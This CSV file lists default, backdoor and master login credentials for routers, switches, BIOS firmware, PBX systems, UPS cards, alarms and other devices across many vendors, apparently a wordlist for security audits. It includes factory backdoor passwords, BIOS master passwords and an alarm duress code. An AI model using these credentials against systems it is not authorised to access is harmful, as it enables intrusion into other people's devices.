ADSL,01.50-01,Multi,admin,,Admin, -3COM,OfficeConnect ADSL Wireless 11g Firewall Router,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1 -3COM,OfficeConnect ADSL,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1 -3COM,OfficeConnect ISDN Routers,5x0,Telnet,,PASSWORD,Admin, -3COM,OfficeConnect Remote Router,812 ADSL and 840 SDSL,Telnet,root,!root,Administrator, -3COM,OfficeConnect Wireless AP,,,,admin,Administrator, -3COM,OfficeConnect Wireless,,HTTP,,admin,Admin, -3COM,OfficeConnect,812,Multi,root,!root,Admin, -3COM,Router,3000/5000 Series,Boot Prompt,,,Administrator,3COM Solution ID 3KB6942 -3COM,SS III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_ -3COM,SuperStack 3 Switch,4900,Console,recover,recover,Administrator, -3COM,SuperStack 3,4400-49XX,Multi,manager,manager,User can access/change operational setting but not security settings, -3COM,SuperStack 3,4XXX,Multi,admin,,Admin, -3COM,SuperStack 3,4XXX,Multi,monitor,monitor,User, -3COM,SuperStack II Switch,1100/3300,Console,3comcso,RIP000,initialize, -3COM,SuperStack II Switch,1100/3300,Telnet,admin,,Administrator, -3COM,SuperStack II Switch,1100/3300,Telnet,manager,manager,Manager, -3COM,SuperStack II Switch,1100/3300,Telnet,monitor,monitor,Monitor, -3COM,SuperStack II Switch,1100/3300,Telnet,security,security,Admin, -3COM,SuperStack II Switch,1100/3300,Telnet,security,security,Administrator, -3COM,SuperStack II Switch,2200,Telnet,debug,synnet,, -3COM,SuperStack II Switch,2700,Telnet,tech,tech,, -3COM,SuperStack II Switch,2700,Telnet,tech,tech,Admin, -3COM,SuperStack III Switch,4XXX,Multi,manager,manager,Admin, -3COM,SuperStack III Switch,4XXX,Multi,recovery,recovery,Reset, -3COM,Switch,3300XM,Multi,admin,admin,Admin, -3COM,US Robotics ADSL Router,8550,HTTP,,12345,Administrator, -3COM,Wireless AP,ANY,Multi,admin,comcomcom,Admin,Works on all 3com wireless APs -3COM,Wireless AP,Any,Multi,admin,comcomcom,Admin, -3COM,cellplex,,Multi,,,Admin, -3COM,cellplex,,Multi,admin,admin,Admin, -3COM,cellplex,7000,,operator,,Admin, -3COM,cellplex,7000,Telnet,admin,admin,Admin, -3COM,officeconnect,,Multi,,,Admin, -3COM,superstack II Netbuilder,11.1,Multi,,,Admin, -3COM,superstack II,1100/3300,,3comcso,RIP000,initialize,resets all pws to defaults -3Com,,1.25,,root,letmein,, -3Com,3CRWDR100A-72,2.06 (Sep 21 2005 14:24:48),HTTP,admin,1234admin,Admin,Provided by Ya.com provider in Spain -3Com,AirConnect Access Point,,,,comcomcom,, -3Com,CoreBuilder,6000,,debug,tech,, -3Com,Internet Firewall,3C16770,HTTP,admin,password,Admin, -3Com,LinkSwitch and CellPlex,,,tech,tech,, -3Com,OfficeConnect 5×1,at least 5.x,,,PASSWORD,, -3Com,Shark Fin,Comcast-supplied,HTTP,User,Password,Diagnostics page,192.160.100.1 -3Com,SuperStack II Switch 1100,,,manager,manager,, -3Com,SuperStack II Switch 2200,,,debug,synnet,, -3Com,SuperStack II Switch 3300,,,manager,manager,, -3Com,SuperStack/CoreBuilder,,,admin,,, -3Com,SuperStack/CoreBuilder,,,write,,, -3Com,Switch 3000/3300,,,monitor,monitor,, -3Com,e960,,HTTP,Admin,Admin,Administrator, -3M,VOL-0215 etc.,,SNMP,volition,volition,Admin,for Volition fibre switches -3M,Volition Fibre Switches,VOL-0215 etc.,SNMP,volition,volition,Admin, -3M,Volition,VOL-0215,,volition,,Administrator,http://multimedia.3m.com/mws/mediawebserver?6666660Zjcf6lVs6EVs666xa9COrrrrQ- -3M,Volition,VOL-0215,HTTP,VOL-0215,,Administrator,http://multimedia.3m.com/mws/mediawebserver?6666660Zjcf6lVs6EVs666xa9COrrrrQ- -3com,3C16405,,Multi,admin,,Admin, -3com,3CRADSL72,1.2,Multi,,1234admin,Admin,snmp open by default with public/private community -3com,3c16405,,Console,Administrator,,Admin, -3com,3c16405,,Multi,,,Admin, -3com,3comCellPlex7000,,,tech,tech,, -3com,812,,HTTP,Administrator,admin,Admin, -3com,CB9000/4007,3,Console,FORCE,,Admin,This will recover a lost password and reset the switch config to Factory Default -3com,Cable Managment System SQL Database (DOSCIC DHCP),Win2000 & MS,,DOCSIS_APP,3com,Admin, -3com,CellPlex,7000,Telnet,root,,Admin, -3com,CellPlex,7000,Telnet,tech,,Admin, -3com,CellPlex,7000,Telnet,tech,tech,Admin, -3com,HiPerACT,v4.1.x,Telnet,admin,,Admin, -3com,Home Connect,,,User,Password,, -3com,LANplex,2500,Telnet,,admin,Admin, -3com,NBX100,2.8,,administrator,0,, -3com,Netbuilder,,Multi,admin,,Admin, -3com,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin, -3com,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin, -3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,HTTP,,admin,Admin, -3com,OfficeConnect Wireless 11g,,HTTP,,admin,Admin, -3com,SS III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_ -3com,Superstack II 3300FX,,,admin,,, -3com,Switch 3000/3300,,,Admin,3com,, -3com,Switch,3300XM,Multi,admin,admin,Admin, -3com,cellplex,,Multi,,,Admin, -3com,cellplex,,Multi,admin,admin,Admin, -3com,cellplex,7000,Multi,admin,admin,Admin,RS-232/telnet -3com,cellplex,7000,Telnet,operator,,Admin, -3com,corebuilder,7000/600/3500/2500,,defug,synnet,, -3com,office connect,11g,Multi,admin,,User, -3com,officeconnect,,Multi,,,Admin, -3com,officeconnect,,Multi,admin,,Admin, -3com,super,,Telnet,admin,,Admin, -3com,superstack II Netbuilder,11.1,Multi,,,Admin, -3ware,3DM,,HTTP,Administrator,3ware,Admin, -3xLogic,IP Camera system,,HTTP,admin,12345,, -5200-Serie,,,,,,, -8level,,WRT-150,,admin,admin,,192.168.1.1 -ABB,Controller,AC 800M,,service,ABB800xA,,https://library.e.abb.com/public/f355a67551218ae7c1257dc0003298c5/3BDS021515-600_-_en_AC_800M_6.0_PROFINET_IO_Configuration.pdf -ABB,Ethernet Adapter Module,SREA-01,http:80/tcp,admin,admin,,https://www.inverterdrive.com/file/ABB-SREA-01-Manual -ACC,Congo/Amazon/Tigris,All,Multi,netman,netman,, -ACCTON,CheetahChassis Workgroup Switch,3714,SNMP/web/Telnet,admin,,, -ACCTON,CheetahChassis Workgroup Switch,3714,SNMP/web/Telnet,manager,manager,, -ACCTON,CheetahChassis Workgroup Switch,3714,SNMP/web/Telnet,monitor,monitor,, -ACCTON,Wirelessrouter,,,,0000,Administrator, -ACCTON,Wirelessrouter,T-online,HTTP,,0,Admin,YEAHH -ACIE SECURITE,ADIP,ANY,HTTP,adip,admin,Administrator,http://www.acie-server.com/CONTROL_D_ACCES/ADIP/Notice/ADIP_US.pdf -ACIE SECURITE,ADIP,ANY,HTTP,adip,consul,Consultant,http://www.acie-server.com/CONTROL_D_ACCES/ADIP/Notice/ADIP_US.pdf -ACIE SECURITE,ADIP,ANY,HTTP,adip,insta,Installer,http://www.acie-server.com/CONTROL_D_ACCES/ADIP/Notice/ADIP_US.pdf -ACTi,IP Camera,All Models,http://192.168.0.100,admin,123456,,https://www.acti.com/products/cameras -ADC Kentrox,Pacesetter Router,,Telnet,,secret,, -ADIC,Scalar 100/1000,,HTTP,admin,secure,Admin, -ADIC,Scalar i2000,,Multi,admin,password,Admin, -ADP,ADP Payroll HR Database,Any,Multi,sysadmin,master,Admin, -ADT,Safewatch Pro3000,,,,2580,Duress,This is a 'duress' code and likely on multiple ADT models as set by technicians. | http://krebsonsecurity.com/2013/01/does-your-alarm-have-a-default-duress-code/ -AIRAYA Corp,AIRAYA WirelessGRID,,,Airaya,Airaya,Administrator,The default IP address is 192.168.1.70. | http://www.airaya.com/support/guides/WirelessGRID-Manual_O.pdf -ALCATEL,4400,,Console,mtcl,,User, -ALLNET,ALL 130DSL,,,admin,password,, -ALLNET,ALL129DSL,,,admin,admin,Admin, -ALLNET,T-DSL Modem,Software Version:,HTTP,admin,admin,Admin, -ALLNET,T-DSL Modem,v1.51,HTTP,admin,admin,Admin, -AMBIT,ADSL,,Telnet,root,,Admin, -AMI,AT 49,,Multi,,,Admin, -AMI,PC BIOS,,Console,,A.M.I,Admin, -AMI,PC BIOS,,Console,,AM,Administrator, -AMI,PC BIOS,,Console,,AMI,Administrator, -AMI,PC BIOS,,Console,,AMI.KEY,Admin, -AMI,PC BIOS,,Console,,AMIDECOD,Admin, -AMI,PC BIOS,,Console,,AMI~,Admin, -AMI,PC BIOS,,Console,,BIOSPASS,Admin, -AMI,PC BIOS,,Console,,CMOSPWD,Admin, -AMI,PC BIOS,,Console,,aammii,Admin, -AMI,PC BIOS,,Console,,amipswd,Admin, -AMX,CSG,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Endeleo UDM-0102,,,,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Endeleo UDM-0404,,,,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Endeleo UDM-0808-SIG,,,administrator,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Environmental Controls ENV-VST-C,,,,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,IS-SPX-1000,,,,,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MAX Server,,,root,mozart,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MAX-CSD10,,HTTP,administrator,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MAX-CSE,,HTTP,administrator,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MET-ECOM/-D,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NI Series,,,NetLinx,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NI Series,,,administrator,password,Administrator,https://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-ENET24,,,Admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-ENET24,,,guest,guest,Guest,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-ENET8POE,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-WAP1000,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-WAP250G,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-WAPZD1000 (Zone Director),,,admin,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXR-ZGW-PRO/-ZRP-PRO,,,Admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXR-ZGW/-ZRP,,,Admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,TVM-1600,,,,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,V2 Server,,,Administrator,vision2,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AOC,zenworks 4.0,,Multi,,admin,Admin, -APC,9606 Smart Slot,,Telnet,,backdoor,Admin, -APC,AP9606 SmartSlot Web/SNMP Management Card,AOS 3.2.1 and AOS 3.0.3,telnet,(any),TENmanUFactOryPOWER,, -APC,Any,Firmware Pri,,apcuser,apc,, -APC,Call-UPS,AP9608,Console,,serial number of the Call-UPS,Administrator,(Access menu Control+P) -APC,MasterSwitch,AP9210,,apc,apc,Administrator, -APC,Powerchute Plus,4.x for Netware 3.x/4.x,Console,POWERCHUTE,APC,Administrator, -APC,SNMP Adapter,2.x,,apc,apc,, -APC,Share-UPS,AP9207,Console,,serial number of the Share-UPS,Administrator,(Access menu Control+P) -APC,Smart UPS,,Multi,apc,apc,Admin, -APC,UPS Network Management Card 2,,HTTP,readonly,apc,Read Only,https://www.jlab.org/Hall-D/Documents/manuals/APC%20stuff/AP9630%209631%20UPS%20Network%20Management%20Card%202%20User's%20Guide%20firmware%20V5.1.1.pdf -APC,UPS Network Management Card 2,,Telnet/SSH,device,apc,Restricted User,https://www.jlab.org/Hall-D/Documents/manuals/APC%20stuff/AP9630%209631%20UPS%20Network%20Management%20Card%202%20User's%20Guide%20firmware%20V5.1.1.pdf -APC,UPSes (Web/SNMP Mgmt Card),,HTTP,device,device,Admin,Secondary access account (next to apc/apc) -APC,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase -APC,Web/SNMP Management Card,AP9606,Multi,apc,apc,Admin, -APC,Web/SNMP Management Card,AP9606,Multi,apc,apc,Administrator, -ARtem,ComPoint - CPD-XT-b,CPD-XT-b,Telnet,,admin,Admin, -ASMAX,AR701u/ASMAX AR6024,,HTTP,admin,epicrouter,Admin, -ASMAX,AR800C2,,HTTP,admin,epicrouter,Admin, -AST,PC BIOS,,Console,,SnuFG5,Admin, -AST,PC BIOS,,Console,,SnuFG5,Administrator, -ASUS,ASUS SMTA Router,Firmware: 3.5.1.3 (C0.0.7.4) - Hardware: 1100 (AVG6002 REV:2.26A),HTTP + Telnet,admin,admin,Admin,Router / VoIP Gateway (@ 192.168.3.1) -ASUS,ASUS WL-330 Pocket Wireless Access Point,,HTTP,admin,admin,Admin,http://192.168.1.1 -ASUS,WL-500G,1.7.5.6,HTTP,admin,admin,Admin, -ATL,P1000,,Multi,Service,5678,Service Maintenance Admin,Tape Library Service Access -ATL,P1000,,Multi,operator,1234,User,Tape Library Operator Access -AVAYA,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,check the Bugtraq archives for more information -AVAYA,P333,,Telnet,Administrator,ggdaseuaimhrke,Admin, -AVAYA,P333,,Telnet,root,ggdaseuaimhrke,Admin, -AVAYA,g3R,v6,Console,root,ROOT500,Admin, -AVM,Fritz!Box Fon,7270,,,,,http://fritz.box -AVM,Fritz!Box,any,,,0,admin, -AWARD,PC BIOS,,Console,,1322222,Administrator, -AWARD,PC BIOS,,Console,,256256,Admin, -AWARD,PC BIOS,,Console,,256256,Administrator, -AWARD,PC BIOS,,Console,,589589,Administrator, -AWARD,PC BIOS,,Console,,589721,Administrator, -AWARD,PC BIOS,,Console,,,Admin, -AWARD,PC BIOS,,Console,,?award,Administrator, -AWARD,PC BIOS,,Console,,AWARD SW,Administrator, -AWARD,PC BIOS,,Console,,AWARD?SW,Administrator, -AWARD,PC BIOS,,Console,,AWARD_PW,Administrator, -AWARD,PC BIOS,,Console,,AWARD_SW,Admin, -AWARD,PC BIOS,,Console,,AWARD_SW,Administrator, -AWARD,PC BIOS,,Console,,Award,Admin, -AWARD,PC BIOS,,Console,,Award,Administrator, -AWARD,PC BIOS,,Console,,BIOS,Admin, -AWARD,PC BIOS,,Console,,BIOS,Administrator, -AWARD,PC BIOS,,Console,,CONCAT,Administrator, -AWARD,PC BIOS,,Console,,CONDO,Admin, -AWARD,PC BIOS,,Console,,CONDO,Administrator, -AWARD,PC BIOS,,Console,,HELGA-S,Administrator, -AWARD,PC BIOS,,Console,,HEWITT RAND,Admin, -AWARD,PC BIOS,,Console,,HEWITT RAND,Administrator, -AWARD,PC BIOS,,Console,,HLT,Administrator, -AWARD,PC BIOS,,Console,,PASSWORD,Admin, -AWARD,PC BIOS,,Console,,PASSWORD,Administrator, -AWARD,PC BIOS,,Console,,SER,Administrator, -AWARD,PC BIOS,,Console,,SKY_FOX,Administrator, -AWARD,PC BIOS,,Console,,SWITCHES_SW,Administrator, -AWARD,PC BIOS,,Console,,SW_AWARD,Admin, -AWARD,PC BIOS,,Console,,SW_AWARD,Administrator, -AWARD,PC BIOS,,Console,,SZYX,Administrator, -AWARD,PC BIOS,,Console,,Sxyz,Admin, -AWARD,PC BIOS,,Console,,Sxyz,Administrator, -AWARD,PC BIOS,,Console,,TTPTHA,Admin,bea2 hash -AWARD,PC BIOS,,Console,,TTPTHA,Administrator, -AWARD,PC BIOS,,Console,,ZAAADA,Administrator, -AWARD,PC BIOS,,Console,,aLLy,Administrator, -AWARD,PC BIOS,,Console,,aPAf,Admin, -AWARD,PC BIOS,,Console,,aPAf,Administrator, -AWARD,PC BIOS,,Console,,admin,Administrator, -AWARD,PC BIOS,,Console,,alfarome,Admin, -AWARD,PC BIOS,,Console,,alfarome,Administrator, -AWARD,PC BIOS,,Console,,award.sw,Administrator, -AWARD,PC BIOS,,Console,,award_?,Administrator, -AWARD,PC BIOS,,Console,,award_ps,Administrator, -AWARD,PC BIOS,,Console,,awkward,Administrator, -AWARD,PC BIOS,,Console,,biosstar,Administrator, -AWARD,PC BIOS,,Console,,biostar,Admin, -AWARD,PC BIOS,,Console,,biostar,Administrator, -AWARD,PC BIOS,,Console,,condo,Admin, -AWARD,PC BIOS,,Console,,condo,Administrator, -AWARD,PC BIOS,,Console,,djonet,Administrator, -AWARD,PC BIOS,,Console,,efmukl,Administrator, -AWARD,PC BIOS,,Console,,g6PJ,Administrator, -AWARD,PC BIOS,,Console,,h6BB,Admin, -AWARD,PC BIOS,,Console,,h6BB,Administrator, -AWARD,PC BIOS,,Console,,j09F,Admin, -AWARD,PC BIOS,,Console,,j09F,Administrator, -AWARD,PC BIOS,,Console,,j256,Administrator, -AWARD,PC BIOS,,Console,,j262,Admin, -AWARD,PC BIOS,,Console,,j262,Administrator, -AWARD,PC BIOS,,Console,,j322,Administrator, -AWARD,PC BIOS,,Console,,j64,Admin, -AWARD,PC BIOS,,Console,,j64,Administrator, -AWARD,PC BIOS,,Console,,lkw peter,Administrator, -AWARD,PC BIOS,,Console,,lkwpeter,Admin, -AWARD,PC BIOS,,Console,,lkwpeter,Administrator, -AWARD,PC BIOS,,Console,,setup,Admin, -AWARD,PC BIOS,,Console,,setup,Administrator, -AWARD,PC BIOS,,Console,,t0ch20x,Admin, -AWARD,PC BIOS,,Console,,t0ch20x,Administrator, -AWARD,PC BIOS,,Console,,t0ch88,Administrator, -AWARD,PC BIOS,,Console,,wodj,Admin, -AWARD,PC BIOS,,Console,,wodj,Administrator, -AWARD,PC BIOS,,Console,,zbaaaca,Administrator, -AWARD,PC BIOS,,Console,,zjaaadc,Administrator, -AWARD,PC BIOS,,Console,Administrator,admin,Admin, -AWARD,PC BIOS,1.0A,Console,,,Admin, -AXIS,200 V1.32,,,admin,,, -AXUS,AXUS YOTTA,,Multi,,0,Admin,Storage DAS SATA to SCSI/FC -Acc/Newbridge,Congo/Amazon/Tigris,Any,,netman,netman,, -Accelerated Networks,DSL CPE and DSLAM,,Telnet,sysadm,anicust,, -Accelerated,DSL CPE and DSLAM,,Telnet,sysadm,anicust,, -Accton,Gigabit Switches,,Telnet/SSH,__super,(caclulated),Administrator,The password is based on the MAC address--see http://www.vettebak.nl/hak/ for info. Devices sold by 3Com & Dell & SMC & Foundry & EdgeCore. -Aceex,Modem ADSL Router,,HTTP,admin,,Admin, -Acer,517te,,Multi,,,Admin, -Acer,Phoenix,,Multi,,,Admin, -Acer,Phoenix,,Multi,,Admin,, -Acti,IP Camera system,,HTTP,admin,admin,, -Actiontec,GE344000-01,,,,,Administrator, -Actiontec,M1424WR,,HTTP,admin,password,Administrator,http://192.168.1.1/ -Actiontec,Wireless Broadband Router,,Multi,admin,password,Admin,Verizon Fios Setup -AdComplete.com,Ban Man Pro,,,Admin1,Admin1,Administrator, -AdComplete.com,Banman Pro,12,HTTP,Admin1,Admin1,Administrator,http://www.banmanpro.com/installnet40.asp -Adaptec,RAID Controller,,,Administrator,adaptec,Administrator, -Adaptec,Storage Manager PRO,all,Multi,Administrator,adaptec,Admin, -Adcon Telemetry,Telemetry Gateway,A840,terminal program,root,840sw,,http://www.adcon.com/index.php?option=com_docman&task=doc_download&gid=41&Itemid=239&lang=de -Adcon Telemetry,Wireless Modem,A440,terminal program,root,840sw,,http://www.adcon.com/index.php?option=com_docman&task=doc_download&gid=41&Itemid=239&lang=de -Adcon Telemetry,addVANTAGE,Pro 6.1,HTTP:8080/tcp,root,root,,http://adcon.com/index.php?option=com_docman&task=doc_download&gid=31&Itemid=239&lang=en -AddPac Technology,AP2120,,HTTP,root,router,Administrator, -Addon,GWAR3000/ARM8100,,HTTP,admin,admin,Admin,http://www.addon-tech.com -Adobe,CQ,,,admin,admin,Administrator,This account is used for the connection between CQ WCM and CRX. | https://docs.adobe.com/docs/v5_2/html-resources/cq5_guide_power_user/ch07s02.html#sect_default_users_and_groups -Adobe,CQ,,,author,author,,Can be used as a webmaster as it has access to the entire/content tree. | https://docs.adobe.com/docs/v5_2/html-resources/cq5_guide_power_user/ch07s02.html#sect_default_users_and_groups -Adobe,Experience Manager,,HTTP,admin,admin,Administrator,https://helpx.adobe.com/experience-manager/using/datasourcepool.html -Adobe,Experience Manager/CQ,,,anonymous,anonymous,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Experience Manager/CQ,,,aparker@geometrixx.info,aparker,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Experience Manager/CQ,,,jdoe@geometrixx.info,jdoe,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Experience Manager/CQ,,,replication-receiver,replication-receiver,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Vignette Connector,,HTTP,vgnadmin,vgnadmin,Administrator,http://dev.day.com/content/docs/en/crx/connectors/vignette/current.html -Adtech,AX4000,,,root,ax400,Administrator, -Adtran,MX2800,,Telnet,,adtran,, -Adtran,NetVanta,3430,HTTP,admin,password,Administrator,http://www.adtran.com/pub/Library/Quick_Start_Guides/Public_View/NetVanta%203430%20Quick%20Start%20Guide.pdf -Adtran,TSU 600 Ethernet module,All,,18364,,Admin, -Advanced Integration,PC BIOS,,Console,,Advance,Administrator, -Advantek Networks,Wireless LAN 802.11 g/b,,Multi,admin,,Admin,http://www.advanteknetworks.com/ -Aethra,Starbridge EU,,HTTP,admin,password,Admin, -AirLink Plus,RTW026,V0.80.0010 (firmware),HTTP,,admin,Administrator, -AirTies RT-210,AirTies RT-210,AirTies RT-210,Telnet,admin,admin,Admin,AirTies RT-210 -Airlink,AnyGate,GW-200,HTTP,,admin,Administrator, -Aironet,All,,,,,Administrator, -Airties,Air4310,ANY,HTTP,,,Admin,Username is not asked and the password is empty just need to click 'OK' -Airway,Transport,,,,0000,Administrator, -Aladdin,eSafe Appliance,,Console/SSH,root,kn1TG7psLu,root, -Alcatel,7300 ASAM,,TL1,SUPERUSER,ANS#150,Admin, -Alcatel,OXO,1.3,Multi,,admin,User, -Alcatel,Office 4200,,Multi,,1064,Admin, -Alcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,Admin, -Alcatel,OmniPCX Office,4.1,FTP,ftp_inst,pbxk1064,Installer, -Alcatel,OmniPCX Office,4.1,FTP,ftp_nmc,tuxalize,NMC, -Alcatel,OmniPCX Office,4.1,FTP,ftp_oper,help1954,Operator, -Alcatel,OmniStack 6024,,Telnet,admin,switch,Admin, -Alcatel,OmniStack/OmniSwitch,,Telnet/ Console,diag,switch,Admin, -Alcatel,Omnistack/Omniswitch,,Telnet/,diag,switch,Admin, -Alcatel,Omnistack/Omniswitch,,Telnet/Console,diag,switch,Admin, -Alcatel,Omnistack/omniswitch,,Telnet,diag,switch,Admin, -Alcatel,PBX,,Port 2533,at4400,at4400,, -Alcatel,PBX,,Port 2533,dhs3mt,dhs3mt,, -Alcatel,PBX,,Port 2533,halt,tlah,, -Alcatel,PBX,,Port 2533,kermit,kermit,, -Alcatel,PBX,,Port 2533,mtcl,mtcl,, -Alcatel,PBX,4400,Port 2533,adfexc,adfexc,, -Alcatel,PBX,4400,Port 2533,at4400,at4400,, -Alcatel,PBX,4400,Port 2533,client,client,, -Alcatel,PBX,4400,Port 2533,dhs3mt,dhs3mt,, -Alcatel,PBX,4400,Port 2533,dhs3pms,dhs3pms,, -Alcatel,PBX,4400,Port 2533,halt,tlah,, -Alcatel,PBX,4400,Port 2533,install,llatsni,, -Alcatel,PBX,4400,Port 2533,kermit,kermit,, -Alcatel,PBX,4400,Port 2533,mtch,mtch,, -Alcatel,PBX,4400,Port 2533,mtcl,mtcl,, -Alcatel,PBX,4400,Port 2533,root,letacla,, -Alcatel,PBX,4400,Telnet,adfexc,adfexc,, -Alcatel,PBX,4400,Telnet,at4400,at4400,, -Alcatel,PBX,4400,Telnet,client,client,, -Alcatel,PBX,4400,Telnet,dhs3mt,dhs3mt,, -Alcatel,PBX,4400,Telnet,dhs3pms,dhs3pms,, -Alcatel,PBX,4400,Telnet,halt,tlah,,This will immediately shutdown the 4400 upon login! Account is UID 0. -Alcatel,PBX,4400,Telnet,install,llatsni,,This will immediately shutdown the 4400 upon login! Account is UID 0. -Alcatel,PBX,4400,Telnet,kermit,kermit,, -Alcatel,PBX,4400,Telnet,mtch,mtch,, -Alcatel,PBX,4400,Telnet,mtcl,mtcl,, -Alcatel,PBX,4400,Telnet,root,letacla,root, -Alcatel,Speedtouch,510,HTTP/Telnet,,,,Default IP 192.168.1.254/24 | http://www.speedtouch.com/support.htm -Alcatel,Timestep VPN 1520,3.00.026,Permit config and console,root,permit,Admin,Perm/Config port 38036 -Alcatel,VPN Gateway,15xx/45xx/7xxx,,root,permit,Admin, -Alcatel/Newbridge/Timestep,VPN Gateway 15xx/45xx/7xxx,Any,,root,permit,, -Alien Technology,ALR-9900,,Telnet/SSH,alien,alien,Administrator,Undocumented telnet ports: 23 and 2323. | http://seclists.org/fulldisclosure/2010/May/63 -Alien Technology,ALR-9900,,Telnet/SSH,root,alien,Administrator,Undocumented telnet ports: 23 and 2323. | http://seclists.org/fulldisclosure/2010/May/63 -Allied Telesyn,ALAT8326GB,,Multi,manager,manager,Admin, -Allied Telesyn,AT Router,,HTTP,root,,Admin, -Allied Telesyn,AT-8024(GB),,Console,,admin,Admin, -Allied Telesyn,AT-8024(GB),,HTTP,manager,admin,Admin, -Allied Telesyn,AT-AR130 (U) -10,,HTTP,Manager,friend,Admin,Default IP is192.168.242.242 -Allied Telesyn,AT8016F,,Console,manager,friend,Admin, -Allied Telesyn,Rapier G6 Switch,,,,manager,friend, -Allied Telesyn,Various Switches,,,manager,manager,Administrator, -Allied,CJ8MO E-U,,Telnet,,,Admin, -Allied,Telesyn,,Multi,manager,friend,Admin, -Allied,Telesyn,,Multi,secoff,secoff,Admin, -Allnet,ALL0275 802.11g AP,1.0.6,HTTP,,admin,Admin, -Allnet,ALL129DSL,,,admin,admin,Administrator,http://www.allnet.de/ -Allot,Netenforcer,,,admin,allot,Administrator, -Allot,Netenforcer,,,root,bagabu,Administrator, -Alteon,ACEDirector3,,console,admin,,, -Alteon,ACEDirector3,,console,admin,,Admin, -Alteon,ACEswitch,180e,HTTP,admin,admin,Admin, -Alteon,ACEswitch,180e,HTTP,admin,admin,Administrator, -Alteon,ACEswitch,180e,HTTP,admin,linga,Admin, -Alteon,ACEswitch,180e,HTTP,admin,linga,Admin, -Alteon,ACEswitch,180e,Telnet,admin,,, -Alteon,AD4,9,Console,admin,admin,Admin,Factory default -Alteon,Web Systems,5.2,Telnet,,14admin,Admin, -Ambit,Cable Modem 60678eu,1.12,Multi,root,root,Admin, -Ambit,Cable Modem,,Multi,root,root,Admin,Time Warner Cable issued modem -Ambit,Cable Modems,,,root,root,, -Ambit,Cable Modems,,,user,user,, -Ambit,ntl:home 200,2.67.1011,HTTP,root,root,Admin,This is the cable modem supplied by NTL in the UK -American Dynmics,IP Camera system,,HTTP,admin,admin,, -Amino,AmiNET Set Top Box,,HTTP,,leaves,Administrator,Management Password | http://www.vsicam.com/files/documents/AmiNet/AmiNet_and_AVN_Configuration_Manual.pdf -Amino,AmiNET Set Top Box,,HTTP,,snake,Administrator,Network Config Password | http://www.vsicam.com/files/documents/AmiNet/AmiNet_and_AVN_Configuration_Manual.pdf -Amitech,wireless router and access point 802.11g 802.11b,any,HTTP,admin,admin,Admin,Web interface is on 192.168.1.254 available on the LAN ports of the AP. -AmpJuke,AmpJuke,,HTTP,admin,pass,Administrator, -Amptron,PC BIOS,,Console,,Polrty,Admin, -Amptron,PC BIOS,,Console,,Polrty,Administrator, -Andover Controls,Infinity,any,Console,acc,acc,Admin,Building management system -Apache Project,,Apache,,jj,,script, -Apache,Tomcat Web Server Administration Tool,5,HTTP,admin,,Admin, -Apache,Tomcat Web Server,5,HTTP,admin,,Admin, -Apache,Tomcat,,,admin,j5Brn9,Administrator,As installed in Sun Solaris. -Apache,Tomcat,,HTTP,admin,admin,, -Apache,Tomcat,,HTTP,admin,tomcat,, -Apache,Tomcat,,HTTP,role,changethis,, -Apache,Tomcat,,HTTP,role1,role1,, -Apache,Tomcat,,HTTP,root,changethis,, -Apache,Tomcat,,HTTP,root,root,, -Apache,Tomcat,,HTTP,tomcat,changethis,, -Apache,Tomcat,,HTTP,tomcat,tomcat,, -Apache,Tomcat,5.5,HTTP,both,tomcat,, -Apache,Tomcat,5.5,HTTP,role1,tomcat,, -Apple Computer,Airport,,,,public,User, -Apple Computer,Network Assistant,,,,xyzzy,Administrator, -Apple Computer,Remote Desktop,,,,xyzzy,Administrator, -Apple,AirPort Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details -Apple,Airport Base Station (Dual Ethernet),2,Multi,,password,Guest,See Apple article number 106597 for details -Apple,Airport Extreme Base Station,2,Multi,,admin,Guest,see Apple article number 107518 for details -Apple,Airport,1.1,,,public,User, -Apple,Almost all iOS devices,>4.2,SSH,root,alpine,, -Apple,Network Assistant,,,,xyzzy,admin, 